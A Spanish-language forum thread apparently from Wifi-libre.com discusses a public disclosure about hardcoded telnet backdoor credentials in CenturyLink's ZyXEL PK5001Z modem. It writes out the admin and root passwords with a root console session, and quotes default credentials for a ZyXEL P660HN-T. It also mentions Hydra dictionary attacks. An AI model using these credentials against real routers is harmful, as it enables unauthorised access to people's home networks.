Backdoor telnet en Zyxel con credenciales "hardcoded" genéricos.

kcdtv · 02-11-2017 23:42:20

Backdoor telnet en Zyxel con credenciales "hardcoded" genéricos.

He mirrado en el diccionario pero no he visto una traducción satisfactoria para "hard coded".
"Codificado"... Cierto. Pero con esta noción de que el usuario final normal y corriente no puede hacer nada al respecto.
Ni deshabilitar la puerta trasera, ni modificar los credenciales.
Lo que no está dicho explícitamente en el full dislcosure es si es posible o no deshabilitar el servicio telnet para colmatar la brecha.
De paso; el full disclosure es este:

ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. @ PacktStorm by Matthew Sheimo

Hace mucho tiempo que telefónica no ha contratado a Zyxell para equipar los hogares de sus clientes.
En el caso presente se ha encontrado en el PK5001Z

Del ISP norte americano Century Link

¡Qué bonito el marketing!
Internet al natural en un campo de trigo con OGM, big_smile
El router es un poco basto pero dicen que tienes antenas internas de 5dBi lo que no está mal (si es cierto)

The PK5001Z features 802.11n technology with 5 dBi antennas (2T x 2R) which provides the
ultimate solution: improved speed, reduced dead zones, and extended coverage. With data
rates of up to 300 Mbps, the PK5001Z provides stable and reliable wireless connections for
high-speed data and multimedia delivery

Obteniendo acceso root mediante telnet

Se hace en dos tiempos:

Conexión como administrador,
```
username: admin
password: CenturyL1nk
```
Podéis ver a continuación el resultado de un "whoami" (conocer su nombre de usuario) una vez conectado con admin:CenturyL1nk
```
$ whoami
admin_404A03Tel
```
Escalar privilegios con su.
Para "ser root" y tener "un poder absoluto" sobre el Punto de Acceso se hace con el conocido comando su que permite obtener los privilegios root desde una consola.
Y la contraseña "root" genérica es.... zyad5001
```
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name:                      ZyXEL Communications Corp.
```

Conclusión

Hay que aplaudir el ISP Century Link por dejarse una cuenta y por su contraseña original y compleja: CenturyL1nk
El i por el 1... Estos tíos son de los buenos. big_smile .
Ahora lo más interesante es ver la contraseña root de Zyxell que tampoco está rebuscada.
Buscando por la red se ven otros avisos de seguridad acerca de zyxell con historias de cuentas con credenciales comunes (admin, 1234,) o que son sujetos a ataques por diccionario (porque se basan en el nombre de la empresa, el modelo)
Algo que se rompe con Hydra y un diccionario a medidas bien pensado.
¡Ojo con los Zyxell!

crash · 03-11-2017 00:07:07

jajaajajaja que buenos son los admins de zyxell jajajaja

kcdtv · 03-11-2017 00:22:47

otro ejemplo de cagada by zyxel

#5
Vulnerability: Default administrative credentials (ZyXEL P660HN-T v1)
NO-CVE
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions
might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true

Me gusta mucho true:true
¿De verdad? big_smile
Buneo, la backdoor true:true es la que se ha dejado el ISP y supongo que la admin:password es la de zyxel con "superpoderes"
ver TrueOnline ZyXEL / Billion Command Injection / Default Credentials

crash · 03-11-2017 01:18:00

jajajajajajaja lo que te decía, que son buenos, de lo mejor, de lo mejorcito....

Tema	Respuestas	Vistas	Ultimo mensaje
script para la creación del hash pmkid por crash	3	139	Hoy 14:45:15 por crash
Hostbase 1.2 está aqui por Koala [ 1 2 3 4 5 ]	103	5432	Hoy 14:28:04 por crash
Demostración ataque PMKID - Explicado paso a paso por Xavi [ 1 2 3 ]	67	1991	Hoy 13:35:16 por crash
Colabora con datos a la investigación sobre nuevos ataques en pixiewps por kcdtv [ 1 2 ]	27	2600	Ayer 21:05:17 por josep345
hashcat falla desde v 4.0.1: falta hashcat.pid y hahscat.outfiles por bala	17	592	Ayer 16:36:48 por bala

Foro Wifi-libre.com

Anuncio

#1 02-11-2017 23:42:20